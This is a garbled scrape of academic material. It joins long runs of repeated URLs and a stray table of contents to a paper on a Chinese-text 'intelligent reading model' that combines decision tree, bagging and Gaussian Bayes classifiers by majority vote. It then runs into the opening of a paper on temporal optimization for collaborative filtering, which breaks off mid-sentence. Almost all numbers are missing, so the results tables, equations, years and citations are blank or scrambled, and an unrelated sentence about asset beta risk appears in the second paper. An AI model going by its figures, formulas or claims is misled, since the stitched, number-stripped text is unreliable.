http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.nime.org/proceedings/ /nime _ .pdf http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://www.thefuntheory.com/piano-staircase http://dx.doi.org/ . /peerj-cs. an interactive audio-visual installation using ubiquitous hardware and web-based software deployment introduction related work artistic concept the installation movement detection video rendering musicological model audio rendering audience feedback and discussion online live conclusion references paper title (use style: paper title) international journal of advanced network, monitoring and controls volume , no. , a study of intelligent reading model yu jun school of computer science and engineering xi’an technological university xi’an, , shaanxi, china e-mail: yujun@xatu.edu.cn kang qinyu school of computer science and engineering xi’an technological university xi’an, , shaanxi, china e-mail: @qq.com hu zhiyi engineering design institute army academy of pla beijing, , china e-mail: huzhiyi v @ .com li zhonghua school of computer science and engineering xi’an technological university xi’an, , shaanxi, china e-mail: @qq.com abstract—in order to solve the problem of how to find out the required information quickly from a large number of reading texts, this paper constructs an intelligent reading model. the model adopts the principle of "the minority obeys the majority". the results of the classifier trained by the three algorithms, those are decision tree, bagging and gauss bayes algorithm, are filtered to build an intelligent reading model. based on the experimental results, the objective evaluation results of the new combinatorial algorithm are attained. keywords-natural language processing(nlp); decision tree; bagging; gaussian bayesian algorithm i. introduction in recent years, with the rapid developing of the internet and other emerging media, human beings have entered the era of information explosion. at the same time, more and more people hope that computers can understand human language so as to help human beings to perform various daily tasks better. natural language processing(nlp) [ ] , as a typical example of artificial intelligence application in the practical field, is a necessary means for modern people to mine a large amount of data and information. its main goal is to let computers learn to understand and use human natural language. therefore, natural language processing (nlp) has become a research hot spot in recent years. at present, as one of the representative products of natural language processing(nlp), "smart interactive technology [ ] " has gradually penetrated into many products. however, many smart products can only recognize some specific commands. for example, when the input is "open qq (qq is the abbreviation of tencent qq, which is an internet-based instant messaging software developed by tencent company)", it can start qq. but the input is "look at qq" and nothing happens. in addition, people have to read a lot of texts in daily life, such as novels, tutorials, etc. sometimes you can solve the problem by just looking for a small part of the text without having to read through the whole article. for example, we can solve our legal doubts by looking for certain passages in the legal literature and be unnecessary to read the entire legal literature. based on this, in order to make our reading more "intelligent", we need to establish an intelligent reading model that can use natural language to communicate with machines and let machines serve us in order to minimize the learning burden. this paper builds an intelligent reading model. since english is based on words, which are separated by spaces. however, chinese is in the form of word, each of words in one chinese sentence have to be connected for describing a complete meaning. for example, the english sentence "i am a student", chinese means "i am a student". in english, the computer can easily know that "student" is a word by spaces, however, in chinese, "student" is made up of two words, which can only be combined to mean a word. therefore, chinese word segmentation is to divide the sequence of chinese characters into meaningful words. due to certain uncertainty in chinese word segmentation, it is necessary to adopt many different technologies such as jibe word segmentation [ ] and tf-idf weight algorithm [ ] . in view of the simpleness of the previous model, a new combination model, namely our intelligent reading model, is constructed by combining multiple algorithms as well as adopting the principle of "the minority obeys the majority". among them, the principle of "the minority obeys the majority" means that if a data is trained by three classifiers, the output result of classification is " / / ", because there is a large number of in results, so the data of the final result is . finally, the validity of the model is verified by experiment and calculation. ii. the overall process of building an intelligent reading model the establishment of intelligent reading model includes five parts, these are data acquisition, data processing, feature extraction, training classifier and building model. the overall process is shown in figure . the details are as follows. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , data acquisition data processing feature extraction training classifier building model figure . overall framework ) data acquisition:because there are all kinds of text on the network, and the quantity is huge, so the python network crawler [ ] is used to obtain the data. that is stored in a txt file. ) data processing : due to the inaccuracy of the word segmentation, it is necessary to use the algorithm based on information entropy to find new words, as well as put the new words into the custom dictionary, followed that process the text by chinese word segmentation, stop word filtering and so on. ) feature extraction:for the processed data in step ( ), the tf-idf algorithm is used to extract the feature value and generate the word-text matrix. ) training classifier : decision tree [ ] , bagging [ ] and gaussian bayesian algorithms [ ] are used to train the word-text matrix generated by step ( ).so that three classifiers could be obtained. ) building model. for the three classifiers obtained in step ( ), the principle of "the minority obeys the majority" is adopted to establish the intelligent reading model. iii. description of the process of modeling this paper constructs an intelligent reading model. firstly, the python network crawler is used for data acquisition. followed that jieba word segmentation technology and tf-idf weight algorithm were adopted to preprocess the sample data. finally, extracting the feature value, training classifier, establishing model and carrying out other operations. the detailed operation is described as follows. a. data acquisition there are a variety of texts on the web. due to the large number of data, python web crawlers are usually used to obtain data. but some websites have anti-crawler mechanisms. therefore, while designing a web crawler, a simulation operation of browser accessing is necessary. through analyzing the web page source codes, regular expressions are used to obtain the required data. the library files, such as beautifulsoup, requests and re can be used to crawl data. the content of the crawl is the problems and all their corresponding answers. finally, the acquired data is stored in a txt format file and is added a fixed tag name, so as to be convenient for later data processing. b. data processing by analyzing the acquired data, a lot of noise in the text information can be found. for example, word segmentation is inaccurate, as well as there are a large number of stop words. if these noises are brought into the operation of word frequency statistics, it will not only reduce the processing speed, but also greatly affect the experimental results. therefore, the first important thing is to preprocess the data. data preprocessing is divided into three steps, which are generating and loading of the custom dictionaries, chinese word segmentation and stop-word filtering. it is as shown in figure . input the acquired data custom dictionary generation and loading chinese word segmentation stop word filtering output keywords figure . flow of data preprocessing ) generation and loading of custom dictionary due to the number of words included in the jieba dictionary is limited, which leads to the inaccuracy of text segmentation. for instance, it is inaccurate segmentation of people's names and place names. so that it is necessary to require a custom dictionary to improve the accuracy of word segmentation. the information entropy algorithm is used to find new words and generate custom dictionaries. after that, the generated custom dictionaries are loaded into the codes to improve the precision of word segmentation. ) chinese word segmentation. after the above steps are completed, the word segmentation is beginning. this paper adopts a chinese word segmentation module developed by python-jieba word segmentation, which divides all data sets in chinese. it combines rule-based and statistics-based methods [ ] . the rule-based method means that, the word segmentation based on an existing dictionary which adopts manual rules such as forward maximum matching, backward maximum matching and bidirectional maximum matching. for example, for the sentence "shanghai tap water comes from sea", forward maximum matching is used. it scans from forward to back, as well as makes the separated words exist in the dictionary and lets the words as long as possible. at last the sentence of "shanghai / tap water / from / sea" can be obtained. this kind of method is simple and easy to implement, and the required data amount is not high. the statistics-based method is to summarize the probability distribution of words and the common collocation between words from a large number of manually labeled corpus, and supervised learning is used to train the word segmentation model. for the sentence "shanghai tap water comes from the sea", the most basic participle method international journal of advanced network, monitoring and controls volume , no. , based on statistics is to try all possible participle schemes, because of any two words, or need to cut, or without segmentation. for all possible word segmentation schemes, the probability of each scheme is counted according to the corpus, and then the one with the greatest probability is retained. obviously, "shanghai / tap water / come from / sea" is more likely than "shanghai tap / water / come from / sea ", because "shanghai" and "tap water" appear more frequently in tagged corpus than "shanghai tap" and "water". the result of partial participle is shown in figure . figure . participle screenshot in figure , it can be found that there are a large number of meaningless modal particle in the results of word segmentation, which will greatly influence the final experimental results. therefore, it is necessary to carry out the filtering of stop words. ) filter stop words stop words [ ] refers to words that appear frequently in the text without practical significance. such as modal particle, adverbs, prepositions, conjunctions, etc. in order to save storage space and improve search efficiency, these meaningless stop words must be filtered out before processing text. to find out the stop word accurately, the following indicators can be used to measure the effectiveness of words. a) term frequency. tf is a simple evaluation function whose value is the number of words occurring in the training set. the theoretical assumption of the tf evaluation function is that, when one word appears frequently in the text, it is generally regard as a noise word. b) document frequency. similar to term frequency (tf), the theoretical assumption is that when one word appears frequently in the text, the word is generally regard as a noise word. the experimental result is shown as table . table i. stop word list(partial) category stop words preposition on, in, at, under, beside, behind, to, over, with pronoun everyone, everything, everywhere ... ... adverbs so, still, therefore, moreover, however as shown in table , using filtered stop words to generate stop-word list, as well as to load the list into codes. followed that the result of word is matched with the words in the stop- word list. if the matching is successful, the word from the result of the segmentation will be deleted. c. feature extraction after the preprocessing of the above steps, although the stop word is removed, the sentence still contains a large number of words, which brings difficulties to the text vectorization process. therefore, the main purpose of feature extraction is to minimize the number of words for being processed without changing the core content of the original text, so as to reducing the dimension of vector space, simplifying calculation and improving the speed and efficiency of text processing. commonly used methods include term frequency-inverse document frequency(tf- idf), information gain [ ] , x statistics, etc. hereby tf-idf algorithm is used to transform keyword information into weight vector in here. the steps are described as follows. ) calculating the word frequency, which is tf weight. textin the wordsofnumber totalthe textin the appears worda timesofnumber the tf  ( ) ) calculating the inverse document frequency. that is idf weight. firstly, a corpus is required to build up for simulating the language environment. the larger the idf, the more concentrated this feature is in the text, it means that the more able the words are to distinguish the content of the text. ) word t hecont aining t ext ofnumber corpus ain t ext sofnumber t ot al log(idf   ( ) ) calculating the term frequency inverse document frequency (tf - idf) values. idft f idf-t f  ( ) the larger the tf-idf value, the more important the word is. calculating and sorting the tf-idf value of each word in the text. the first six keywords of each question and corresponding answer in the text are found in turn, and the corresponding weight of the six keywords is returned. if there are less than keywords, the residual weight is set to . international journal of advanced network, monitoring and controls volume , no. , by using the tf-idf algorithm, the text information is vectorized and the lexical text matrix is obtained. the details are described as follows.             mn m m n n m n www www www t t t d d d       hereby, ti (i= , , ..., n) is the feature item in document d. as well as wij (i, j= , , ..., n) is the weight of the feature item. the calculation formula is described as follows. idftf idf-tfw ij  ( ) d. training classifier in this paper, the lexical - text matrix is trained with three algorithms of decision tree, bagging and gaussian bayes. the specific steps of each algorithm are described below. ) decision tree decision tree algorithm mainly includes feature selection and decision tree generation. the feature selection is based on the relationship between the information gain and the data set. according to the characteristics of the selected data set, the decision tree is generated recursively using id algorithm [ ] . the specific steps are described as follows. a) calculating information entropy. in order to select the feature of good classification ability for training data, the information gain is introduced. and then, the calculation formula of information entropy is described as follows. assume d is the training element group in the training set, its entropy can be expressed as follows.    m i i i )(plogp-info(d) ( ) tuples trainingofnumber total category in this elements ofnumber p i  ( ) hereby, m represents the total number of categories, and pi represents the occurring probability of category i which appears in the entire training tuple. entropy is a measure of the uncertainty of random variables. the actual meaning is the average amount of information required for the class label of tuples d. the larger the entropy is, the greater the uncertainty of the variable. if the training tuple d is divided according to the characteristic attribute a, the expected information of d is described as formula ( ). (note: the expected information of d is conditional entropy, which is based on the classification of characteristic attribute a).    v j j j a )info(d d d (d)info ( ) dj is the classification of feature attribute a, as well as v is the number of types of the characteristic attribute a. b) calculating the information gain. the information gain is the difference between the two information entropy. (d)info-info(d)gain(a) a  ( ) as the above formula ( ) shows, gain(a) represents the amount of information obtained by classifying a as a node. the more information, the more important a is. c) id algorithm is used to establish each child node in the tree. according to the characteristics of the data set selected by the information gain, the algorithm selects the feature with the maximum information gain as the judgment node and acts as the sub-node in the tree. d) using recursive thinking, repeat above steps from ( ) to ( ) so as to establish the decision tree. ) bagging integrated decision tree bagging is a technology of repeated sampling from data according to uniform probability distribution. the algorithm does use the different training set to fit a single member classifier in the ensemble classifier, as well as bootstrap sampling is used by training set in the fitting process. which is a random sampling with a rewind. so bagging can improve the accuracy of unstable model, and reduce the degree of over-fitting. the final result of the algorithm is to construct a series of prediction functions, and combining them into a prediction function by voting. the process is shown in figure . the steps are described as follows. a) the bootstrap [ ] method is used to select n training samples from the sample set, and using it as the training set t -tn. this process is executing for k times, and k subsets {t , t ...tk} are selected. b) k sample subsets are trained on their own training data on all attributes. and then k classification models are obtained. c) according to the classification model obtained by the above steps, the value of each {p , p …, pk} model is predicted respectively. d) the value {p , p , …, pk} of each model is combined by the average method. the final result is output. the formula of the averaging method is described as follows.   k )(p k p (x) i i x ( ) hereby, pi is the value of a model. k is the number of samples training. international journal of advanced network, monitoring and controls volume , no. , training set (t -tn) final results t t … tk bootstrap sampling c c … ck p p … pk classification model forecast result figure . bagging process ) gaussian bayes algorithm compared with decision tree and bagging algorithms, the greatest advantage is that when the large scale training set is selected, the gauss bayes algorithm only has relatively small number of features for each item, and the training and classification of the project is only a mathematical operation for the characteristic probability. therefore, gaussian bayes algorithm has a fast speed when training large amount of data. the flow of this algorithm is shown as in figure . preparation stage stage of classifier training application stage identifying attributes acquisition of training samples calculation p(yi) calculated condit- ional probability calculation p (x | yi) p (yi) judge the category preparation stage stage of classifier training application stage figure . gaussian bayesian algorithm flow as shown in figure , the entire algorithm flow can be divided into three phases. the first is preparation stage. this stage determines the characteristic attributes according to the specific situation, and dividing each feature attribute appropriately. and then, some of the items is classified by manually so as to form a training sample set. the input of this phase is all the data to be classified, and the output is the feature attribute and the training sample. this stage is the only stage that needs to be completed manually in the whole naive bayesian classification. the quality of the classifier will have an important impact on the whole process, as well as be affected by the feature attributes, the classification of the feature attributes and the training samples. the second is classifier training stage. this stage is generating the classifier. firstly, the occurrence frequency of each class is calculated in the training sample. and then the conditional probability of each category on the characteristic attribute is calculated. finally, the results are recorded. the input is the feature attribute and the training sample, and the output is the classifier. the third is application stage. the task at this stage is to classify the classified items by using the classifier. the input of this stage is classifier and the item to be classified, and the output is the mapping relationship between items to be classified and categories. the specific steps are described as follows. the specific steps are described as follows. a) assume }x,...,x,{xx m  be an item to be classified, and each xi be a characteristic attribute of x. b) setting have a set of y categories where y = ,y = . c) calculating conditional probability )|(p ji yx .the formula of ( ) is shown as follows. d) if it is existed as )}y|max{p(x)y|p(x jik  , then it will be k yx  . e) according to bayesian theorem, the following formulas can be obtained. the formula of ( ) is shown as follows. f) the class that maximizes the value of p(x|yi) p(yi) is found out, and the items to be classified fall into this category. international journal of advanced network, monitoring and controls volume , no. , )}y|p(x),...,y|p(x),y|p(x),y|p(x),...,y|p(x),y|{p(x)|(p m m ji yx ( )    m i jiijjmj j ii )y|p (x)p (y))p (yy|)...p (xy|)p (xy|p (x))p (yy|p (x ( ) e. building model the above three algorithms is adopted to construct the three model. followed that, the principle of "the minority is subordinate to the majority " is used to reconstruct a new model. the model is called as intelligent reading model. the principle of "the minority is subordinate to the majority" means that, if a data is trained by three model, the output result of classification is " / / ". because of the number of ' ' in the result is more than the number of ' ', the final result of the data is . iv. verification and analysis of the model the data from the testing set are input into the intelligent reading model, as well as the processed results analyzed. the quality of the model is measured by two technical indicators, that is, accuracy and f-measure value. the two-dimensional confusion matrix is shown in table . the meaning of " the forecast is wrong, the actual is wrong (tn)" is that, the actual label category of the data is wrong, and it is still wrong after prediction. based on the two-dimensional confusion matrix shown in table , the formula ( ) of the accuracy rate and the formula ( ) of f- measure are given as below. table ii. two-dimensional confusion matrix actual value positive wrong such as type ( ) forecast value positive the forecast is positive, the actual is positive (tp) the forecast is positive, the actual is wrong (fp) wrong the forecast is wrong, the actual is positive (fn) the forecast is wrong, the actual is wrong (tn) fpfntntp tntp accuracy    ( ) fnfptp* tp* m easure-f   ( ) as shown in formula ( ), the accuracy rate refers to the proportion of successful data in all predicted data. the predicted success means "the predicted value is same as the actual value". it includes two kinds of labels such as "the forecast is positive, the actual is positive (tp)" and "the forecast is wrong, the actual is wrong (tn)". when users ask some questions, they only want the right answers. therefore, tn label is not necessary. as shown in formula ( ), the f- measure value is a comprehensive evaluation index of accuracy rate and recall rate. because it does not include tn label, it is often used to evaluate the classification model. accuracy is a very objective evaluation index, but sometimes the accuracy rate does not represent the quality of the algorithm. especially in the case of imbalance of positive and negative samples, the accuracy evaluation index has great defects. the most common f-measure method is the weighted harmonic average of the accuracy rate and recall rate (the recall rate is the measure of the cover surface). because the f-measure method comprehensively considers the accuracy rate and recall rate, it effectively avoids the problem of unbalanced data distribution. therefore, comparing with the accuracy rate, the f-measure method can better reflect the quality of the algorithm. among them, the higher the value of f-measure, indicating the better classification results of the corresponding algorithm. if we combine the three algorithms such as decision tree, bagging and gauss bayes, the results of the combination algorithm and the single algorithm are shown in table . table iii. comparison of prediction results decision tree bagging gauss bayesian combination algorithm accuracy . . . . f-measure . . . . international journal of advanced network, monitoring and controls volume , no. , table shows that the accuracy of the combination algorithm is . , while the other three separate algorithm accuracy is . , . and . . therefore, the combination algorithm is more accurate than the other three methods. in addition, the f-measure value of the combined algorithm is . . the f-measure value of the other three methods is . , . and . . therefore, the combination algorithm is better than the other three separate algorithms in terms of f-measure. whether it's accuracy or f-measure, the result of the combined algorithm is better than that of the other three separate algorithms. therefore, the intelligent reading model is based on the combination of decision tree, bagging and gauss bayesian algorithms. in order to verify the superiority of the method, we are selecting about pieces of data for experimental verification. the experimental results are shown in figure and figure . combination algorithm . . . . . . . . . . decision tree . . . . . . . . . . gauss bayesian algorithm . . . . . . . . . . . . . . . . . a c c u ra c y r a te figure . accuracy comparison diagram combination algorithm . . . . . . . . . . decision tree . . . . . . . . . . gauss bayesian algorithm . . . . . . . . . . . . . . . . . f -m e a su r figure . f-measure comparison international journal of advanced network, monitoring and controls volume , no. , experiment in figure , the x-axis represents the amount of data in the experiment, and the y-axis represents accuracy, which shows that comparing with the three algorithms of decision tree, bagging and gauss bayes, the combination algorithm has a slightly better accuracy. in figure , the x- axis represents the amount of data, and the y-axis represents the f-measure. the f-measure of the combined algorithm is obviously superior to other three separate algorithms. v. conclusion the reading model constructed in this paper makes reading more intelligent. aiming at the problem of natural language input, the corresponding answer can be given according to the existing txt content. according to the experimental data, it can be concluded that the intelligent reading model based on the combination of decision tree, bagging and gauss bayesian algorithm has a good classification ability. references [ ] xi xuefeng, zhou guodong. a study of deep learning for natural language processing [j]. journal of automation! ( ): - [ ] chen lian. research and application of key interactive technology based on web intelligent education platform [d]. graduate school of chinese academy of sciences (chengdu institute of computer application). [ ] han dongxu, chang baobao. domain adaptability method of chinese word segmentation model [j]. journal of computer science, china ( ): - . [ ] yang bin, han qingwen, lei min, zhang yapeng, liu xiangguo, yang yaqiang, ma xuefeng. short text classification algorithm based on improved tf-idf weight [j]. journal of chongqing university of technology (natural science) ( ): - . [ ] qian cheng, yang xiaolan, zhu fuxi. python-based web crawler technology [j]. heilongjiang science and technology information ( ): . [ ] wang daoming, lu changhua, jiang weiwei, xiao mingxia, li inevitable. research on decision tree svm multiple classification method based on particle swarm optimization algorithm [j]. journal of electronic measurement and instruments ( ): - . [ ] bi kai, wang xiaodan, yao xu, zhou jindeng. an adaptive selective integration based on bagging and confusion matrix [j]. chinese journal of electronic science (ej). ( ): - . [ ] zhu mingmin. study on bayesian network structure learning and reasoning [d]. xi'an university of electronic science and technology. [ ] zan hongying, zuo weisong, zhang kunli, wu yunfang. a study on emotion analysis combined with rules and statistics [j]. computer engineering and science ( ): - . [ ] gu yijun, fan xiaozhong, wang jianhua, wang tao, huang weijin. automatic selection of chinese stops word list [j]. beijing institute of technology proceedings ( ): - . [ ] liu qinghe, liang zhengyou. a feature selection method based on information gain [j]. computer engineering and applications ( ): - + . [ ] huang yuda, fan taihua. analysis and optimization of decision tree id algorithm [j]. computer engineering and design! ( ): - . [ ] liu jian, wu yi, tan lu. improvement of bootstrap method for self- help sampling [j]. mathematical theory and application ( ): - . submitted august accepted november published december corresponding author nurfadhlina mohd sharef, nurfadhlina@upm.edu.my academic editor faizal khan additional information and declarations can be found on page doi . /peerj-cs. copyright al-hadi et al. distributed under creative commons cc-by . open access latent based temporal optimization approach for improving the performance of collaborative filtering ismail ahmed al-qasem al-hadi , nurfadhlina mohd sharef , md nasir sulaiman , norwati mustapha and mehrbakhsh nilashi faculty of ocean engineering technology and informatics, universiti malaysia terengganu, kuala nerus, terengganu, malaysia faculty of computer science and information technology, universiti putra malaysia, serdang, selangor, malaysia faculty of computing, universiti teknologi malaysia, skudai, johor, malaysia abstract recommendation systems suggest peculiar products to customers based on their past ratings, preferences, and interests. these systems typically utilize collaborative filtering (cf) to analyze customers’ ratings for products within the rating matrix. cf suffers from the sparsity problem because a large number of rating grades are not accurately determined. various prediction approaches have been used to solve this problem by learning its latent and temporal factors. a few other challenges such as latent feedback learning, customers’ drifting interests, overfitting, and the popularity decay of products over time have also been addressed. existing works have typically deployed either short or long temporal representation for addressing the recommendation system issues. although each effort improves on the accuracy of its respective benchmark, an integrative solution that could address all the problems without trading off its accuracy is needed. thus, this paper presents a latent-based temporal optimization (lto) approach to improve the prediction accuracy of cf by learning the past attitudes of users and their interests over time. experimental results show that the lto approach efficiently improves the prediction accuracy of cf compared to the benchmark schemes. subjects artificial intelligence, data mining and machine learning, data science keywords temporal factorization, recommender systems, collaborative filtering, drift, decay, matrix factorization introduction recommendation systems are some of the most powerful methods for suggesting products to customers based on their interests and online purchases (jonnalagedda et al., ; lin, li & lian, ; nilashi, bin ibrahim & ithnin, ; nilashi et al., ; zhang et al., b). in terms of personalization of recommendations, one of the most prevalently used methods is collaborative filtering (cf) (nilashi, bin ibrahim & ithnin, ; sardianos, ballas papadatos & varlamis, ; nilashi et al., ; wu et al., ). in cf, personalized prediction of products depends on the latent features of users in a rating matrix. however, the cf prediction accuracy decreases if the rating matrix is sparse (zhang et al., a; li & chi, ; idrissi & zellou, ). several types of factorization techniques such as baseline, how to cite this article al-hadi iaa-q, sharef nm, sulaiman mn, mustapha n, nilashi m. . latent based temporal optimization approach for improving the performance of collaborative filtering. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:nurfadhlina@upm.edu.my https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. singular value decomposition (svd), matrix factorization (mf), and neighbors-based baseline have been exploited to address the problem of data sparsity (mirbakhsh & ling, ; al-hadi et al., b) by predicting the missing rating scores in the rating matrix. similarly, various factorization-based techniques including the use of latent (vo, hong & jung, ; nguyen & do, ) and baseline factors (koenigstein, dror & koren, ) (such as svd (wang et al., )) have been proposed to improve the recommendation accuracy. nevertheless, an unaddressed problem is that a part of the rating scores is misplaced from its original cells while streaming into the memory. this misplacement decreases the meticulousness of the latent feedback. a method based on ensemble divide and conquer (al-hadi et al., ) was adopted to solve the misplacement problem besides addressing the customers’ preferences drift and popularity decay. integration of temporal preferences with factorization methods to solve the sparsity issue has yielded a better performance compared to basic factorization approaches (al-hadi et al., b; li, xu & cao, ; nilashi et al., ; nilashi, bin ibrahim & ithnin, ). the temporal dynamics approach (koren, ) separates the time period of preferences into static digit of bins and extracts a universal weight according to the stochastic gradient descent method to reduce overfitting. nonetheless, the learned universal weight using the temporal dynamics approach has limitations with respect to how it personalizes and represents the fluctuating temporal preferences. the temporal interaction approach (ye & eskenazi, ) enhanced the effectiveness of cf recommender systems by combining the latent factors, short-term preferences, and long-term preferences. the shrunk neighbor approach is applied to obtain clients’ short-term feedbacks (koren, ). this approach detects overfitting when there is a fluctuating scale in the rating scores. for example, in the rating matrix from the movielens dataset, the actual score is smaller than the predicted values. in this theory, the risk of each asset is measured with its beta value (which is the criterion of systematic risk). the fluctuating scale is in the range of – , whereas the anticipated rating scores are [ . ; . ; . ; ]. compared to other temporal approaches (e.g., the short-term based latent technique (yang et al., )), the temporal interaction approach (ye & eskenazi, ) efficiently anticipates performance of cf. nevertheless, problems such as drifting customers’ preferences and popularity decay (e.g., deterioration of marketability of goods) still pose a significant challenge (ye & eskenazi, ). the long temporal-based factorization approach addresses the popularity decay issue (al- hadi et al., b) while the short temporal-based factorization approach (al-hadi et al., a) addresses the drift issue not solved by previous short-term based approaches. these temporal approaches improve the performance of cf but they are characterized by low accuracy. in view of the aforementioned, this paper presents a latent-based temporal optimization (lto) approach to solve the significant limitations of these temporal approaches. as optimization algorithms have proven successful in various areas such as healthcare (zainal et al., )and document processing al-badarneh amer ( ), we extend our earlier work (al-hadi et al., a) and provide a detailed analysis of the proposed approach. the contributions of this paper are summarised below. al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • a comprehensive review of cf-based recommender system techniques. • a proposed lto approach that minimizes overfitting and learns by integrating long and short-term features with the baseline and factorization features. • an lto approach that learns the drift in the users’ interests through an improved rating score prediction. this is achieved by integrating the long and short-term features of users and items with their baseline and factorization features. • an lto approach that solves the sparsity issue by combining the learning output of the overfitting, drift, and decay. • a comparison of lto’s performances with other factorization and temporal-based factorization approaches. in summary, the proposed approach has superior performance as it improves the prediction accuracy in the cf technique by learning accurate latent effects of the temporal preferences of users. the novel features of the lto approach are as follows: • it provides a personalized temporal weighting which is incorporated in matrix factorization to reduce data sparsity error. • it combines time convergence and personalized duration to accommodate consumer’s preferences drifting in the personalized recommendation system. • it utilizes the bacterial foraging optimization algorithm (bfoa) to accurately learn the personalized temporal weights by regularizing the overfitted predicted scores in the rating matrix and to track the factors of drift and decay. the rest of this paper is sectioned as follows: ‘related works’ reviews the past works related to factorization approaches and temporal preferences. in ‘latent-based temporal optimization approch’, lto is elaborated, followed by experimental analysis in ‘experimental settings’. ‘experimental results’ discusses the experimental results. the final section (‘conclusion’) provides a summary and indicates possible future works. related works collaborative filtering cf is a technique developed to make automated predictions (filtering) about the interests of a customer by gathering preferences or rating scores from several other customers (collaborating). the primary idea of the cf approach is that if a user (say x) shares an attitude with another user (y) on a subject, x is more likely to share y’s attitude on a different issue when compared to other randomly chosen users. cf is one of the most implemented techniques used in the design of recommendation systems due to its low computational requirement (jonnalagedda et al., ; sardianos, ballas papadatos & varlamis, ; alhijawi & kilani, ). it utilizes to find similar users or items and calculate predicted rating scores according to ratings of similar users. in addition, cf provides customized recommendations using the similarity values of customers and common preferences while the score of the active customer is placed in the rating score matrix. changes are being made in the personalized al-hadi et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. recommendation to suggest products to customers based on their tastes. this constitutes a well-established methodology with a wide range of application. in the cf technique, a forecast is achieved in three steps. the main step is estimating the values of similarity amongst common clients and the target customer with the use of similarity functions, such as the cosine function (nilashi et al., ; alhijawi & kilani, ). the rating scores supplied by the target client and the similarity values are applied in the next procedure to estimate the expected score of the product using the prediction function. the final step estimates the precision of the forecast by applying the root mean squared error (rmse) function (nilashi et al., ). cf suffers from the data sparsity problem which occurs due to a soaring proportion of undetermined scores in the users’ voting matrix. this problem is solved using several prediction methods such as neighbors-based baseline (bell & koren, ) and matrix factorization (koren, ; nguyen & do, ). however, these factorization-based methods do not address temporal issues such as the drift in users’ preferences and the popularity decay of products. this results in low prediction accuracy. one of the most effective approaches for solving the data sparsity issue is mf (koenigstein, dror & koren, ; al-hadi et al., b). a few mf methods use mathematical formulae to combine hidden feedbacks of customers and products. the hidden feedback of customers, products, and baseline properties are incorporated in the formulae. equation ( ) forecasts the lost scores in the ranking matrix. <̂ui=µ+bu+bi+puq t i , ( ) where <̂ui is the predicted value for the sparse score, µ is the global rate of all rating scores, pu is the latent-feedback matrix of customers, qti is the transpose latent-feedback matrix of products, and bu and bi are the observed deviations of customer u and product i, respectively. to anticipate the sparse scores rating, µ, bu, bi, pu, and 